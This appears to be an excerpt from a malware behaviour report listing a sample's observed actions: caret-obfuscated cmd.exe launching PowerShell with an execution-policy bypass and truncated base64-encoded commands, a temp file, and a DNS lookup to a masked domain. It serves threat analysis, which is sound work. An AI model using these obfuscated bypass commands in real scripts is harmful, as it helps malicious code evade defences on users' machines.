Technical Information
- '<SYSTEM32>\cmd.exe' /c P^O^W^E^R^S^H^E^L^L -exec Bypass -EC JABwAFEAbQBsAFIAeABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACIAQwBvAG0AbQBvAG4AQQBwAHAAb...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1179476.cvr
- DNS ASK mm####usanna.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -EC JABwAFEAbQBsAFIAeABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACIAQwBvAG0AbQBvAG4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAEQA...